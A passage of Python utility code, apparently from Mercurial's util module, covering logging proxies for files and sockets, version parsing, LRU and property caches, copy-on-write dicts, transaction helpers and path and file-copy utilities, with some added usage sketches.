    def recv_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'send', *args, **kwargs)

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendall', *args, **kwargs)

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendto', *args, **kwargs)

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setblocking', *args, **kwargs)

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'settimeout', *args, **kwargs)

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'gettimeout', *args, **kwargs)

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setsockopt', *args, **kwargs)

class baseproxyobserver(object):
    def _writedata(self, data):
        if not self.logdata:
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapestr(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapestr(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapestr(line)))
        self.fh.flush()

class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if size == -1 and res == '':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        data = dest[0:res] if res is not None else b''

        # _writedata() uses "in" operator and is confused by memoryview because
        # characters are ints on Python 3.
        if isinstance(data, memoryview):
            data = data.tobytes()

        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                  logdata=logdata, logdataapis=logdataapis)
    return fileobjectproxy(fh, observer)

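# Illustrative usage sketch (an editor's addition): wrap a file so that every
# read is logged to stderr. The file name and label here are hypothetical.
#
#   import sys
#
#   fh = makeloggingfileobject(sys.stderr, open('data.bin', 'rb'),
#                              'data', writes=False, logdata=True)
#   fh.read(16)    # emits e.g. "data> read(16) -> 16: <escaped bytes>"
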
class socketobserver(baseproxyobserver):
    """Logs socket activity."""
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        self.fh.write('%s> send(%d, %d) -> %d' % (
            self.name, len(data), flags, len(res)))
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))

def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket."""

    observer = socketobserver(logh, name, reads=reads, writes=writes,
                              states=states, logdata=logdata,
                              logdataapis=logdataapis)
    return socketproxy(fh, observer)

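# Illustrative usage sketch (an editor's addition): log every send/recv on a
# client socket. Host, port, and label are hypothetical.
#
#   import socket, sys
#
#   sock = socket.create_connection(('example.com', 80))
#   sock = makeloggingsocket(sys.stderr, sock, 'cli', logdata=True)
#   sock.sendall(b'GET / HTTP/1.0\r\n\r\n')
#   sock.recv(4096)
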
def version():
    """Return version information if available."""
    try:
        from . import __version__
        return __version__.version
    except ImportError:
        return 'unknown'

def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()
    m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
    if not m:
        vparts, extra = '', v
    elif m.group(2):
        vparts, extra = m.groups()
    else:
        vparts, extra = m.group(1), None

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)

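# Illustrative sketch (an editor's addition): callers typically gate behavior
# on the running version by comparing a prefix of the tuple, since trailing
# components may be None:
#
#   if versiontuple(n=2) >= (4, 6):
#       pass    # safe to rely on 4.6+ behavior here
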
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keyword args
    if func.__code__.co_argcount == 0:
        cache = []
        def f():
            if len(cache) == 0:
                cache.append(func())
            return cache[0]
        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f

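# Illustrative sketch (an editor's addition): the cache is keyed on
# positional arguments only and never evicts, so it suits cheap-to-key,
# deterministic helpers. ``_expand`` is a hypothetical name.
#
#   @cachefunc
#   def _expand(path):
#       return os.path.realpath(os.path.expanduser(path))
#
#   _expand('~/repo')    # computed once
#   _expand('~/repo')    # served from the cache
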
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self

class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v

class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """

class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """

class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()

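# Illustrative sketch (an editor's addition): a subclass only has to provide
# close() and release(); the base class turns it into a context manager that
# commits on success and always releases. ``demotxn`` is hypothetical.
#
#   class demotxn(transactional):
#       def close(self):
#           print('committed')
#       def release(self):
#           print('released')
#
#   with demotxn():
#       pass    # prints 'committed' then 'released'
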
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns.
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()

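# Illustrative sketch (an editor's addition): InterventionRequired is a
# "pause for the user", not a failure, so the transaction is committed before
# the exception propagates. ``do_work`` is hypothetical.
#
#   with acceptintervention(tr):
#       do_work(tr)    # may raise InterventionRequired
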
@contextlib.contextmanager
def nullcontextmanager():
    yield

class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (r'next', r'prev', r'key', r'value', r'cost')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None
        self.cost = 0

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
        self.value = None
        self.cost = 0

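# Illustrative sketch (an editor's addition) of how the lrucachedict below is
# typically used, including the optional cost accounting:
#
#   d = lrucachedict(4, maxcost=1000)
#   d.insert(b'key', b'value', cost=500)
#   d[b'key']                                # access moves entry to the head
#   d.insert(b'big', b'x' * 800, cost=800)   # evicts until totalcost <= 1000
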
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Items in the cache can be inserted with an optional "cost" value. This is
    simply an integer that is specified by the caller. The cache can be queried
    for the total cost of all items presently in the cache.

    The cache can also define a maximum cost. If a cache insertion would
    cause the total cost of the cache to go beyond the maximum cost limit,
    nodes will be evicted to make room for the new node. This can be used
    to e.g. set a max memory limit and associate an estimated bytes size
    cost to each item in the cache. By default, no maximum cost is enforced.
    """
    def __init__(self, max, maxcost=0):
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self.capacity = max
        self.totalcost = 0
        self.maxcost = maxcost

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def insert(self, k, v, cost=0):
        """Insert a new item in the cache with optional cost value."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            self.totalcost -= node.cost
            node.value = v
            node.cost = cost
            self.totalcost += cost
            self._movetohead(node)

            if self.maxcost:
                self._enforcecostlimit()

            return

        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                self.totalcost -= node.cost
                del self._cache[node.key]

        node.key = k
        node.value = v
        node.cost = cost
        self.totalcost += cost
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

        if self.maxcost:
            self._enforcecostlimit()

    def __setitem__(self, k, v):
        self.insert(k, v)

    def __delitem__(self, k):
        self.pop(k)

    def pop(self, k, default=_notset):
        try:
            node = self._cache.pop(k)
        except KeyError:
            if default is _notset:
                raise
            return default
        value = node.value
        self.totalcost -= node.cost
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

        return value

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self.__getitem__(k)
        except KeyError:
            return default

    def peek(self, k, default=_notset):
        """Get the specified item without moving it to the head

        Unlike get(), this doesn't mutate the internal state. But be aware
        that it doesn't mean peek() is thread safe.
        """
        try:
            node = self._cache[k]
            return node.value
        except KeyError:
            if default is _notset:
                raise
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            self.totalcost -= n.cost
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self, capacity=None, maxcost=0):
        """Create a new cache as a copy of the current one.

        By default, the new cache has the same capacity as the existing one.
        But, the cache capacity can be changed as part of performing the
        copy.

        Items in the copy have an insertion/access order matching this
        instance.
        """

        capacity = capacity or self.capacity
        maxcost = maxcost or self.maxcost
        result = lrucachedict(capacity, maxcost=maxcost)

        # We copy entries by iterating in oldest-to-newest order so the copy
        # has the correct ordering.

        # Find the first non-empty entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # We could potentially skip the first N items when decreasing capacity.
        # But let's keep it simple unless it is a performance problem.
        for i in range(len(self._cache)):
            result.insert(n.key, n.value, cost=n.cost)
            n = n.prev

        return result

    def popoldest(self):
        """Remove the oldest item from the cache.

        Returns the (key, value) describing the removed cache entry.
        """
        if not self._cache:
            return

        # Walk the linked list backwards starting at tail node until we hit
        # a non-empty node.
        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        key, value = n.key, n.value

        # And remove it from the cache and mark it as empty.
        del self._cache[n.key]
        self.totalcost -= n.cost
        n.markempty()

        return key, value

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.
1436
1436
1437 When a node is accessed, it becomes the freshest entry in the LRU
1437 When a node is accessed, it becomes the freshest entry in the LRU
1438 list, which is denoted by self._head.
1438 list, which is denoted by self._head.
1439
1439
1440 Visually, let's make ``N`` the new head node (* denotes head):
1440 Visually, let's make ``N`` the new head node (* denotes head):
1441
1441
1442 previous/oldest <-> head <-> next/next newest
1442 previous/oldest <-> head <-> next/next newest
1443
1443
1444 ----<->--- A* ---<->-----
1444 ----<->--- A* ---<->-----
1445 | |
1445 | |
1446 E <-> D <-> N <-> C <-> B
1446 E <-> D <-> N <-> C <-> B
1447
1447
1448 To:
1448 To:
1449
1449
1450 ----<->--- N* ---<->-----
1450 ----<->--- N* ---<->-----
1451 | |
1451 | |
1452 E <-> D <-> C <-> B <-> A
1452 E <-> D <-> C <-> B <-> A
1453
1453
1454 This requires the following moves:
1454 This requires the following moves:
1455
1455
1456 C.next = D (node.prev.next = node.next)
1456 C.next = D (node.prev.next = node.next)
1457 D.prev = C (node.next.prev = node.prev)
1457 D.prev = C (node.next.prev = node.prev)
1458 E.next = N (head.prev.next = node)
1458 E.next = N (head.prev.next = node)
1459 N.prev = E (node.prev = head.prev)
1459 N.prev = E (node.prev = head.prev)
1460 N.next = A (node.next = head)
1460 N.next = A (node.next = head)
1461 A.prev = N (head.prev = node)
1461 A.prev = N (head.prev = node)
1462 """
1462 """
1463 head = self._head
1463 head = self._head
1464 # C.next = D
1464 # C.next = D
1465 node.prev.next = node.next
1465 node.prev.next = node.next
1466 # D.prev = C
1466 # D.prev = C
1467 node.next.prev = node.prev
1467 node.next.prev = node.prev
1468 # N.prev = E
1468 # N.prev = E
1469 node.prev = head.prev
1469 node.prev = head.prev
1470 # N.next = A
1470 # N.next = A
1471 # It is tempting to do just "head" here, however if node is
1471 # It is tempting to do just "head" here, however if node is
1472 # adjacent to head, this will do bad things.
1472 # adjacent to head, this will do bad things.
1473 node.next = head.prev.next
1473 node.next = head.prev.next
1474 # E.next = N
1474 # E.next = N
1475 node.next.prev = node
1475 node.next.prev = node
1476 # A.prev = N
1476 # A.prev = N
1477 node.prev.next = node
1477 node.prev.next = node
1478
1478
1479 self._head = node
1479 self._head = node
1480
1480
1481 def _addcapacity(self):
1481 def _addcapacity(self):
1482 """Add a node to the circular linked list.
1482 """Add a node to the circular linked list.
1483
1483
1484 The new node is inserted before the head node.
1484 The new node is inserted before the head node.
1485 """
1485 """
1486 head = self._head
1486 head = self._head
1487 node = _lrucachenode()
1487 node = _lrucachenode()
1488 head.prev.next = node
1488 head.prev.next = node
1489 node.prev = head.prev
1489 node.prev = head.prev
1490 node.next = head
1490 node.next = head
1491 head.prev = node
1491 head.prev = node
1492 self._size += 1
1492 self._size += 1
1493 return node
1493 return node
1494
1494
1495 def _enforcecostlimit(self):
1495 def _enforcecostlimit(self):
1496 # This should run after an insertion. It should only be called if total
1496 # This should run after an insertion. It should only be called if total
1497 # cost limits are being enforced.
1497 # cost limits are being enforced.
1498 # The most recently inserted node is never evicted.
1498 # The most recently inserted node is never evicted.
1499 if len(self) <= 1 or self.totalcost <= self.maxcost:
1499 if len(self) <= 1 or self.totalcost <= self.maxcost:
1500 return
1500 return
1501
1501
1502 # This is logically equivalent to calling popoldest() until we
1502 # This is logically equivalent to calling popoldest() until we
1503 # free up enough cost. We don't do that since popoldest() needs
1503 # free up enough cost. We don't do that since popoldest() needs
1504 # to walk the linked list and doing this in a loop would be
1504 # to walk the linked list and doing this in a loop would be
1505 # quadratic. So we find the first non-empty node and then
1505 # quadratic. So we find the first non-empty node and then
1506 # walk nodes until we free up enough capacity.
1506 # walk nodes until we free up enough capacity.
1507 #
1507 #
1508 # If we only removed the minimum number of nodes to free enough
1508 # If we only removed the minimum number of nodes to free enough
1509 # cost at insert time, chances are high that the next insert would
1509 # cost at insert time, chances are high that the next insert would
1510 # also require pruning. This would effectively constitute quadratic
1510 # also require pruning. This would effectively constitute quadratic
1511 # behavior for insert-heavy workloads. To mitigate this, we set a
1511 # behavior for insert-heavy workloads. To mitigate this, we set a
1512 # target cost that is a percentage of the max cost. This will tend
1512 # target cost that is a percentage of the max cost. This will tend
1513 # to free more nodes when the high water mark is reached, which
1513 # to free more nodes when the high water mark is reached, which
1514 # lowers the chances of needing to prune on the subsequent insert.
1514 # lowers the chances of needing to prune on the subsequent insert.
1515 targetcost = int(self.maxcost * 0.75)
1515 targetcost = int(self.maxcost * 0.75)
1516
1516
1517 n = self._head.prev
1517 n = self._head.prev
1518 while n.key is _notset:
1518 while n.key is _notset:
1519 n = n.prev
1519 n = n.prev
1520
1520
1521 while len(self) > 1 and self.totalcost > targetcost:
1521 while len(self) > 1 and self.totalcost > targetcost:
1522 del self._cache[n.key]
1522 del self._cache[n.key]
1523 self.totalcost -= n.cost
1523 self.totalcost -= n.cost
1524 n.markempty()
1524 n.markempty()
1525 n = n.prev
1525 n = n.prev
1526
1526
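# Editor's illustrative sketch (not part of the original module): a quick
# walkthrough of lrucachedict behavior as defined above. The constructor
# signature lrucachedict(capacity, maxcost=0) is inferred from copy();
# everything else uses methods shown above. Call it manually, e.g. from a REPL.
def _demolrucachedict():
    d = lrucachedict(2)
    d['a'] = 1
    d['b'] = 2
    d['c'] = 3                       # at capacity: 'a' (the oldest) is evicted
    assert d.get('a') is None
    assert d.peek('b') == 2          # peek() does not refresh 'b'
    assert d.popoldest() == ('b', 2)

    # With maxcost, an insert can evict older entries to honor the budget.
    d = lrucachedict(10, maxcost=10)
    d.insert('x', 'big', cost=6)
    d.insert('y', 'bigger', cost=6)  # totalcost 12 > 10 evicts 'x'
    assert d.get('x') is None and d.get('y') == 'bigger'
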
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f

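# Editor's illustrative sketch (not part of the original module): lrucachefunc
# memoizes the ~20 most recent argument values, as implemented above.
def _demolrucachefunc():
    calls = []

    @lrucachefunc
    def square(x):
        calls.append(x)
        return x * x

    assert square(3) == 9
    assert square(3) == 9   # second call is served from the cache
    assert calls == [3]     # the wrapped function body ran only once
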
class propertycache(object):
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value

def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    prop = pycompat.sysstr(prop)
    if prop in obj.__dict__:
        del obj.__dict__[prop]

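# Editor's illustrative sketch (not part of the original module): propertycache
# computes once per instance and stores the result in the instance __dict__
# (shadowing the non-data descriptor); clearcachedproperty() forces a
# recomputation on the next access.
def _demopropertycache():
    class counter(object):
        runs = 0

        @propertycache
        def value(self):
            counter.runs += 1
            return 42

    c = counter()
    assert c.value == 42 and c.value == 42
    assert counter.runs == 1         # the function body ran only once
    clearcachedproperty(c, 'value')
    assert c.value == 42
    assert counter.runs == 2         # recomputed after the cache was cleared
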
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)

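# Editor's illustrative sketch (not part of the original module): feeding many
# small chunks through increasingchunks() yields progressively larger chunks
# bounded by max, amortizing per-chunk overhead for consumers.
def _demoincreasingchunks():
    source = iter(['x' * 100] * 100)   # 100 chunks of 100 bytes
    sizes = [len(c) for c in increasingchunks(source, min=1024, max=4096)]
    assert sum(sizes) == 100 * 100
    assert all(s >= 1024 for s in sizes[:-1])   # only the tail may be short
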
def always(fn):
    return True

def never(fn):
    return False

def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7. But it still affects
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()
    return wrapper

if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x

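# Editor's illustrative sketch (not part of the original module): nogc is used
# as a decorator around container-heavy builders; on PyPy it is a no-op.
@nogc
def _demonogcbuild(n=10000):
    # While this runs, CPython's cyclic GC stays disabled, avoiding the
    # repeated collection passes triggered by the many container allocations.
    return [{} for _ in range(n)]
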
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

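# Editor's illustrative sketch (not part of the original module): on a POSIX
# system (os.sep == '/'), pathto() computes the relative path from one
# root-relative location to another. The byte-string arguments match this
# module's convention of byte paths.
def _demopathto():
    # From the directory /repo/a/b to /repo/a/c: one level up, then down.
    assert pathto(b'/repo', b'/repo/a/b', b'a/c') == b'../c'
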
# the location of data files matching the source code
if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check

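# Editor's illustrative sketch (not part of the original module):
# checksignature turns a TypeError raised by a bad call signature into
# error.SignatureError, while TypeErrors raised deeper inside the wrapped
# function (traceback longer than one frame) still propagate unchanged.
def _demochecksignature():
    @checksignature
    def add(a, b):
        return a + b

    assert add(1, 2) == 3
    try:
        add(1)                       # wrong arity
    except error.SignatureError:
        pass
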
# a whitelist of known filesystems where hardlinks work reliably
_hardlinkfswhitelist = {
    'apfs',
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
